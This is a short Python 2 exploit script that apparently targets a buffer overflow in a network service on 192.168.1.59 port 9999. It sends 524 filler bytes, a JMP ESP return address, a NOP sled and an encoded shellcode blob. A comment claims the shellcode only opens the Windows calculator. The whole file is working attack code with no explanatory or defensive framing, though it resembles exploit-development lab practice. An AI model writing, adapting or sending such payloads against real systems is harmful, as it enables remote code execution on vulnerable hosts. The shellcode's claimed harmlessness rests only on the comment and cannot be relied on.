#!/usr/bin/python
 
import sys,socket
 
esp = "\xF3\x12\x17\x31" #JMP ESP adress in littleendian format
nops = "\x90"*16
shellcode = "\xbe\x32\x12\xe1\xfa\xda\xdd\xd9\x74\x24\xf4\x58\x29\xc9\xb1\x31\x31\x70\x13\x83\xc0\x04\x03\x70\x3d\xf0\x14\x06\xa9\x76\xd6\xf7\x29\x17\x5e\x12\x18\x17\x04\x56\x0a\xa7\x4e\x3a\xa6\x4c\x02\xaf\x3d\x20\x8b\xc0\xf6\x8f\xed\xef\x07\xa3\xce\x6e\x8b\xbe\x02\x51\xb2\x70\x57\x90\xf3\x6d\x9a\xc0\xac\xfa\x09\xf5\xd9\xb7\x91\x7e\x91\x56\x92\x63\x61\x58\xb3\x35\xfa\x03\x13\xb7\x2f\x38\x1a\xaf\x2c\x05\xd4\x44\x86\xf1\xe7\x8c\xd7\xfa\x44\xf1\xd8\x08\x94\x35\xde\xf2\xe3\x4f\x1d\x8e\xf3\x8b\x5c\x54\x71\x08\xc6\x1f\x21\xf4\xf7\xcc\xb4\x7f\xfb\xb9\xb3\xd8\x1f\x3f\x17\x53\x1b\xb4\x96\xb4\xaa\x8e\xbc\x10\xf7\x55\xdc\x01\x5d\x3b\xe1\x52\x3e\xe4\x47\x18\xd2\xf1\xf5\x43\xb8\x04\x8b\xf9\x8e\x07\x93\x01\xbe\x6f\xa2\x8a\x51\xf7\x3b\x59\x16\x07\x76\xc0\x3e\x80\xdf\x90\x03\xcd\xdf\x4e\x47\xe8\x63\x7b\x37\x0f\x7b\x0e\x32\x4b\x3b\xe2\x4e\xc4\xae\x04\xfd\xe5\xfa\x66\x60\x76\x66\x47\x07\xfe\x0d\x97\xb8\x4b\x37\xcc\x5d\xdb\xde\xd9\x74\x24\xf4\x5e\x31\xc9\xb1\x12\x31\x46\x12\x83\xc6\x04\x03\x0d\x39\x2e\xa8\xa0\x9e\x59\xb0\x91\x63\xf5\x5d\x17\xed\x18\x11\x71\x20\x5a\xc1\x24\x0a\x64\x2b\x56\x23\xe2\x4a\x3e\x74\xbc\x1e\x3e\x1c\xbf\x60\x3f\x66\x36\x81\x8f\xfe\x19\x13\xbc\x4d\x9a\x1a\xa3\x7f\x1d\x4e\x4b\xee\x31\x1c\xe3\x86\x62\xcd\x91\x3f\xf4\xf2\x07\x93\x8f\x14\x17\x18\x5d\x56"
#shellcode = windows calc
payload = "A"*524 + esp + nops + shellcode
 
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.59',9999))
 
print s.recv(1024)
s.send(payload)
print s.recv(1024)
 
s.close()